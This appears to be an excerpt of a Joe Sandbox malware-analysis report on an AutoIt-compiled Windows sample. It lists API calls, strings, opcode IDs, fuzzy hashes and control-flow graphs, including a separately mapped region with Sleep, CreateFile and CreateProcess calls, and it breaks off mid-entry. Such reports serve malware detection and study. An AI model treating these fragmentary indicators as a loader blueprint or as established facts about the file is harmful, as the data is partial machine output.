                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                • Opcode ID: ec5ac798aa0e65b503d5690956e9d10b847e44fb9d3b2cde72fc65b385421e26
                                                                                                                • Instruction ID: 9fb798af41a2d54b5ecaeb13beb515697bb503ebee8a42e43d3ea5d0b08b8fcd
                                                                                                                • Opcode Fuzzy Hash: ec5ac798aa0e65b503d5690956e9d10b847e44fb9d3b2cde72fc65b385421e26
                                                                                                                • Instruction Fuzzy Hash: 194114B2318589BBDB245F79EC0DBB93698FB57304F140128F602C72B1CA649E40B6A2

                                                                                                                Control-flow Graph

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                • API String ID: 1825951767-3513169116
                                                                                                                • Opcode ID: 4f16caee16024697d66709cc67acdeb18ce84b30ed1683d8ea9d79b391faab23
                                                                                                                • Instruction ID: 27788d316be69abb29f463c7add86cf7ed48d53851a9c238d6a4333081264a7a
                                                                                                                • Opcode Fuzzy Hash: 4f16caee16024697d66709cc67acdeb18ce84b30ed1683d8ea9d79b391faab23
                                                                                                                • Instruction Fuzzy Hash: 90A17F7191425DAACF05EBA9DC55AEEB778FF16304F400429F415F7191DF705A08CBA1

Control-flow Graph

APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0167201D
Memory Dump Source
• Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction ID: 102d2dbec9fae3262de225265ec5e17c5d47823cee47d93fd32b99b4b7b82694
• Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction Fuzzy Hash: 1A510675A50209FBEB24DFA4CC99FDE7778BF48711F108508F70AAB280DA749645CB60

Control-flow Graph

APIs
• __init_pointers.LIBCMT ref: 00909AE6
  • Part of subcall function 00903187: EncodePointer.KERNEL32(00000000), ref: 0090318A
  • Part of subcall function 00903187: __initp_misc_winsig.LIBCMT ref: 009031A5
  • Part of subcall function 00903187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00909EA0
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00909EB4
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00909EC7
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00909EDA
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00909EED
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00909F00
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00909F13
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00909F26
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00909F39
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00909F4C
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00909F5F
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00909F72
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00909F85
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00909F98
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00909FAB
  • Part of subcall function 00903187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00909FBE
• __mtinitlocks.LIBCMT ref: 00909AEB
• __mtterm.LIBCMT ref: 00909AF4
  • Part of subcall function 00909B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00909AF9,00907CD0,0099A0B8,00000014), ref: 00909C56
  • Part of subcall function 00909B5C: _free.LIBCMT ref: 00909C5D
  • Part of subcall function 00909B5C: DeleteCriticalSection.KERNEL32(0099EC00,?,?,00909AF9,00907CD0,0099A0B8,00000014), ref: 00909C7F
• __calloc_crt.LIBCMT ref: 00909B19
• __initptd.LIBCMT ref: 00909B3B
• GetCurrentThreadId.KERNEL32 ref: 00909B42
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: 9b829665aa6babb97f229b4a942fe573719a94fe1976b6b20b861e6f5b0e76f3
• Instruction ID: 305f387d6eb8972eef15ee007a5562c8d184bd679d070bd8ce32dd205db474cb
• Opcode Fuzzy Hash: 9b829665aa6babb97f229b4a942fe573719a94fe1976b6b20b861e6f5b0e76f3
• Instruction Fuzzy Hash: 4BF0903265D7115EE634B778BC0774B3B989F82774F204A1AF4A4D91D3EF61844151A0

Control-flow Graph

APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008E3A03
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008E3A24
• ShowWindow.USER32(00000000,?,?), ref: 008E3A38
• ShowWindow.USER32(00000000,?,?), ref: 008E3A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 9515ccc353bea26e6d12f333844bb62b8466a90ff73461a8b7d10fc8f064ce2f
• Instruction ID: 61a3c77d07039c38d9bc1f9e5e25cfeeb216708635c5cba455fd835eadf44e26
• Opcode Fuzzy Hash: 9515ccc353bea26e6d12f333844bb62b8466a90ff73461a8b7d10fc8f064ce2f
• Instruction Fuzzy Hash: E5F03A706256907EEA3067237C18F2B2E7DDBC7F50B02002EBE10A2170C6610800EAB0

Control-flow Graph

APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0091D3D7
  • Part of subcall function 008E7BCC: _memmove.LIBCMT ref: 008E7C06
• _memset.LIBCMT ref: 008E40FC
• _wcscpy.LIBCMT ref: 008E4150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008E4160
Strings
Memory Dump Source
• Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
• Opcode ID: 4a1c933cce7fc627bf584215a8adcf0e399601bdad31e6933caf4ef0ddc604b4
• Instruction ID: 45a0110c8c1c4bad3a8c4e0d91620831684c601803b13d9d7ded1cb30d2dbfa9
• Opcode Fuzzy Hash: 4a1c933cce7fc627bf584215a8adcf0e399601bdad31e6933caf4ef0ddc604b4
• Instruction Fuzzy Hash: 2D31CD71108784AED721EB65DC4ABDB77D8FF96314F20452AF699C20A1EB709648CB83

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1108 90541d-905436 1109 905453 1108->1109 1110 905438-90543d 1108->1110 1111 905455-90545b 1109->1111 1110->1109 1112 90543f-905441 1110->1112 1113 905443-905448 call 908b28 1112->1113 1114 90545c-905461 1112->1114 1122 90544e call 908db6 1113->1122 1115 905463-90546d 1114->1115 1116 90546f-905473 1114->1116 1115->1116 1119 905493-9054a2 1115->1119 1120 905483-905485 1116->1120 1121 905475-905480 call 902de0 1116->1121 1125 9054a4-9054a7 1119->1125 1126 9054a9 1119->1126 1120->1113 1124 905487-905491 1120->1124 1121->1120 1122->1109 1124->1113 1124->1119 1127 9054ae-9054b3 1125->1127 1126->1127 1130 9054b9-9054c0 1127->1130 1131 90559c-90559f 1127->1131 1132 905501-905503 1130->1132 1133 9054c2-9054ca 1130->1133 1131->1111 1135 905505-905507 1132->1135 1136 90556d-90556e call 910ba7 1132->1136 1133->1132 1134 9054cc 1133->1134 1137 9054d2-9054d4 1134->1137 1138 9055ca 1134->1138 1139 905509-905511 1135->1139 1140 90552b-905536 1135->1140 1149 905573-905577 1136->1149 1144 9054d6-9054d8 1137->1144 1145 9054db-9054e0 1137->1145 1146 9055ce-9055d7 1138->1146 1147 905521-905525 1139->1147 1148 905513-90551f 1139->1148 1142 905538 1140->1142 1143 90553a-90553d 1140->1143 1142->1143 1150 9055a4-9055a8 1143->1150 1151 90553f-90554b call 9046e6 call 910e5b 1143->1151 1144->1145 1145->1150 1152 9054e6-9054ff call 910cc8 1145->1152 1146->1111 1153 905527-905529 1147->1153 1148->1153 1149->1146 1154 905579-90557e 1149->1154 1155 9055ba-9055c5 call 908b28 1150->1155 1156 9055aa-9055b7 call 902de0 1150->1156 1169 905550-905555 1151->1169 1168 905562-90556b 1152->1168 1153->1143 1154->1150 1159 905580-905591 1154->1159 1155->1122 1156->1155 1160 905594-905596 1159->1160 1160->1130 1160->1131 1168->1160 1170 90555b-90555e 1169->1170 1171 9055dc-9055e0 1169->1171 1170->1138 1172 905560 1170->1172 1171->1146 1172->1168
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 1559183368-0
                                                                                                                • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                • Instruction ID: bc91a92fe4fcfbce5c6b19d9129cd97b62f5e073403529d4a41b79915a351c8d
                                                                                                                • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                • Instruction Fuzzy Hash: 8F51B370A00B05DFDF249F69DC806AF77AAAF41321F258B29F825962D1D7759D908F40
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008E4E0F
                                                                                                                • _free.LIBCMT ref: 0091E263
                                                                                                                • _free.LIBCMT ref: 0091E2AA
                                                                                                                  • Part of subcall function 008E6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008E6BAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                • API String ID: 2861923089-1757145024
                                                                                                                • Opcode ID: bd1455cde96a76f0e648419fc028e10c7cc0dc4f6c65ee21d054cfd95a4cb802
                                                                                                                • Instruction ID: 474e351931015d79b386e61f0ad645a3827a1092bc35edb9cafacdcca831e9e1
                                                                                                                • Opcode Fuzzy Hash: bd1455cde96a76f0e648419fc028e10c7cc0dc4f6c65ee21d054cfd95a4cb802
                                                                                                                • Instruction Fuzzy Hash: 26918A71A0425DAFCF04EFA8DC919EDB7B8FF09314B10442AF816EB2A1DB74A945CB51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01673988: Sleep.KERNELBASE(000001F4), ref: 01673999
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01673BE0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFileSleep
                                                                                                                • String ID: 4QPENH1406E054T3LP225CVSFZUR
                                                                                                                • API String ID: 2694422964-3606023294
                                                                                                                • Opcode ID: 9d4ce5af7830517fd1775bb1d461483df9d0eb826f4e9fdaee0e879d0ce5c4f0
                                                                                                                • Instruction ID: 2a45e24a662a3e45434a805bff159badbeebf391a013b21b4c910e4191e666a0
                                                                                                                • Opcode Fuzzy Hash: 9d4ce5af7830517fd1775bb1d461483df9d0eb826f4e9fdaee0e879d0ce5c4f0
                                                                                                                • Instruction Fuzzy Hash: 2C618230D04288DBEF11DBB4C854BDEBBB9AF15304F044199E6487B2C1D7BA1B49CBA5
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008E35A1,SwapMouseButtons,00000004,?), ref: 008E35D4
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008E35A1,SwapMouseButtons,00000004,?,?,?,?,008E2754), ref: 008E35F5
                                                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,008E35A1,SwapMouseButtons,00000004,?,?,?,?,008E2754), ref: 008E3617
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                • API String ID: 3677997916-824357125
                                                                                                                • Opcode ID: 87e0112736d3ac048d3401a0156cbaf5f9889ded38a721ec2fe308b7ae61cd6e
                                                                                                                • Instruction ID: 09a6a9c387a40337a0c24b3c8d7f3c2a57769706fe459eb533316a648d163143
                                                                                                                • Opcode Fuzzy Hash: 87e0112736d3ac048d3401a0156cbaf5f9889ded38a721ec2fe308b7ae61cd6e
                                                                                                                • Instruction Fuzzy Hash: 89115A71514248BFDB21CFA5EC48DAEB7B8FF16740F014469F805E7220D2719F40A760
                                                                                                                APIs
                                                                                                                  • Part of subcall function 008E4EE5: _fseek.LIBCMT ref: 008E4EFD
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949824
                                                                                                                  • Part of subcall function 00949734: _wcscmp.LIBCMT ref: 00949837
                                                                                                                • _free.LIBCMT ref: 009496A2
                                                                                                                • _free.LIBCMT ref: 009496A9
                                                                                                                • _free.LIBCMT ref: 00949714
                                                                                                                  • Part of subcall function 00902D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00909A24), ref: 00902D69
                                                                                                                  • Part of subcall function 00902D55: GetLastError.KERNEL32(00000000,?,00909A24), ref: 00902D7B
                                                                                                                • _free.LIBCMT ref: 0094971C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                • String ID:
                                                                                                                • API String ID: 1552873950-0
                                                                                                                • Opcode ID: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
                                                                                                                • Instruction ID: 80073560f50c11fa28977e0e68efaa597ace554fd0acd74bff7f3f97fe6e527a
                                                                                                                • Opcode Fuzzy Hash: 6cef8eb787e4e551deb87a41cfcc5f328edab007a71f9a3129ff1eb0514b26a6
                                                                                                                • Instruction Fuzzy Hash: 3C514CB1D04258AFDF259F65DC85A9EBBB9FF89300F10049EF609A3281DB715A80CF59
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 2782032738-0
                                                                                                                • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                • Instruction ID: ba51d46198fab5b221f95191e92686c541a3c3271b0e392a21c9fb80eea900dd
                                                                                                                • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                                                • Instruction Fuzzy Hash: F941A4F5B007469FDB18CE69C884AAE77AAEF85360B24C93DEA15C76C0E770DD408B40
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 008E44CF
                                                                                                                  • Part of subcall function 008E407C: _memset.LIBCMT ref: 008E40FC
                                                                                                                  • Part of subcall function 008E407C: _wcscpy.LIBCMT ref: 008E4150
                                                                                                                  • Part of subcall function 008E407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008E4160
                                                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 008E4524
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008E4533
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0091D4B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378193009-0
                                                                                                                • Opcode ID: 210b6b89b8bb59c2b20673d1893e7cfe132cf55127616d257ca79b64b7242e70
                                                                                                                • Instruction ID: f1f23bbf361e71743601faf2d88075065b8ccee585ef88d60fcf1f15961129ff
                                                                                                                • Opcode Fuzzy Hash: 210b6b89b8bb59c2b20673d1893e7cfe132cf55127616d257ca79b64b7242e70
                                                                                                                • Instruction Fuzzy Hash: 9121D770609788AFE732DB249859BE7BBECEF06314F04049DE69E961D1C3742984DB51
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0091EA39
                                                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0091EA83
                                                                                                                  • Part of subcall function 008E4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E4743,?,?,008E37AE,?), ref: 008E4770
                                                                                                                  • Part of subcall function 00900791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009007B0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                • String ID: X
                                                                                                                • API String ID: 3777226403-3081909835
                                                                                                                • Opcode ID: 45a92dbec912bf8148f668ab2ffed16d31cf4596519373f6ffa7cf16fc8fb7d9
                                                                                                                • Instruction ID: e70be66205f3c18d09493b72a4793c07185431eeb92994bf409e0c98aba88762
                                                                                                                • Opcode Fuzzy Hash: 45a92dbec912bf8148f668ab2ffed16d31cf4596519373f6ffa7cf16fc8fb7d9
                                                                                                                • Instruction Fuzzy Hash: F021C630A1428C9BCF119F98DC45BEE7BFCAF4A714F004019E518E7241DBF459898F91
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                • Opcode ID: d454b82fa66a162b44d108a1e71eb40c57babba85366ec751b6ac2a6f24d8b6e
                                                                                                                • Instruction ID: 7ea0d98903834b97eb5414749b7be668eb5a9f4f2b60f2a8e944f2f172397a8c
                                                                                                                • Opcode Fuzzy Hash: d454b82fa66a162b44d108a1e71eb40c57babba85366ec751b6ac2a6f24d8b6e
                                                                                                                • Instruction Fuzzy Hash: 3F01F971C042187EDB18CAA8CC1AFEE7BFCDB11301F00459EF552D21C1E875A6048B60
                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 016726FD
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 0167271C
                                                                                                                Strings
                                                                                                                Memory Dump Source
